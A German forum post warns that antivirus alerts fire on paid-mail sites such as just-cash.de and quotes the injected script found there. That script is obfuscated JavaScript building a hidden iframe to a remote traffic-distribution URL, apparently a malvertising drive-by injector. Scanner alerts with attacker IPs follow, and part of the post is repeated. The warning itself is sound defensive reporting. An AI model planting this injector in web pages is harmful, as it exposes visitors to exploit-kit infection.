morpheus1510
Well-known member
- 20 April 2006
- 1.371
- 80
Hi,
seit einigen Tagen fällt mir auf, dass auf verschiedenen Paid4-Seiten immer wieder mein Virenscanner anschlägt, zuletzt gerade eben auf just-cash.de (das soll jetzt kein Anprangern dieses Dienstes sein, nur ist das für den Moment das einzige Beispiel, das ich habe).
Auf diesen Seiten ist immer ein ziemlich verdächtiger JavaScript-Code enthalten:
Mein Virenscanner meldet dazu folgendes (immer dasselbe):
Angriff erfolgte von www.rezmas.com (210.48.153.232) auf TCP-Port 1651
oder
Angriff erfolgte von 78.157.142.122 direkt auf TCP-Port 80 (Webserver)
Ich bin mir nicht sicher, ob hier ein Hack der jeweiligen Server vorliegt (aufgrund der Masse eher unwahrscheinlich) oder ob dieser Code evtl. über irgendwelche Werbebanner eingeschleust wird.
Den Betreiber von Just-Cash habe ich bereits informiert.
seit einigen Tagen fällt mir auf, dass auf verschiedenen Paid4-Seiten immer wieder mein Virenscanner anschlägt, zuletzt gerade eben auf just-cash.de (das soll jetzt kein Anprangern dieses Dienstes sein, nur ist das für den Moment das einzige Beispiel, das ich habe).
Auf diesen Seiten ist immer ein ziemlich verdächtiger JavaScript-Code enthalten:
Code:
<!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="https://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c -->
Mein Virenscanner meldet dazu folgendes (immer dasselbe):
HTTP Malicious Toolkit Variant Activity
Angriff erfolgte von www.rezmas.com (210.48.153.232) auf TCP-Port 1651
oder
HTTP Malicious Toolkit Download Activity
Angriff erfolgte von 78.157.142.122 direkt auf TCP-Port 80 (Webserver)
Ich bin mir nicht sicher, ob hier ein Hack der jeweiligen Server vorliegt (aufgrund der Masse eher unwahrscheinlich) oder ob dieser Code evtl. über irgendwelche Werbebanner eingeschleust wird.
Den Betreiber von Just-Cash habe ich bereits informiert.